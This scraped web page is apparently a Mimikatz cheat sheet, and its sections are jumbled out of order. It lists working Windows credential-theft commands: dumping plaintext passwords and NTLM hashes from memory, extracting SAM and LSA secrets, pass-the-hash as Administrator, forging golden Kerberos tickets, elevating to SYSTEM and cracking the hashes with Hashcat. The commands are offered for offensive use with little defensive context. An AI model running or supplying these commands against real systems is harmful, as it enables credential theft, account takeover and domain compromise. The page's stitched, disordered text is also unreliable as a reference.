sekurlsa::pth /user:Administrator /domain:target.local /ntlm:<NTLM_HASH> | Command | Purpose | |---------|---------| | kerberos::list | List current Kerberos tickets | | sekurlsa::tickets | Extract Kerberos tickets from memory | | kerberos::golden /user:... /domain:... /sid:... /krbtgt:... /id:500 | Create Golden Ticket | | kerberos::purge | Delete all existing tickets | 🧂 4. Dump & Crack NTLM Hashes lsadump::sam # Dump SAM file (local users) lsadump::secrets # Extract LSA secrets (service passwords, autologon) token::elevate # Elevate to SYSTEM (if not already) Save hashes → crack with Hashcat (mode 1000) or John . 🧹 5. Bypass & Defense Evasion | Command | Effect | |---------|--------| | !+ | Enable PowerShell output | | log <file.log> | Log output to a file | | cls | Clear screen (in interactive mode) | | sekurlsa::minidump <dumpfile.dmp> | Offline analysis from a memory dump |
– needs driver:
privilege::debug | Command | Result | |---------|--------| | sekurlsa::logonpasswords | Plaintext passwords & NTLM hashes of all logged‑on users | | sekurlsa::wdigest | WDigest credentials (plaintext) | | sekurlsa::tspkg | TS PKG credentials | | sekurlsa::credman | Credential Manager stored credentials | 💀 2. Pass‑the‑Hash (PtH) Use NTLM hash to authenticate without the plaintext password: mimikatz cheat sheet
By continuing to use the site, you agree to the use of cookies. more information
The cookie settings on this website are set to "allow cookies" to give you the best browsing experience possible. If you continue to use this website without changing your cookie settings or you click "Accept" below then you are consenting to this.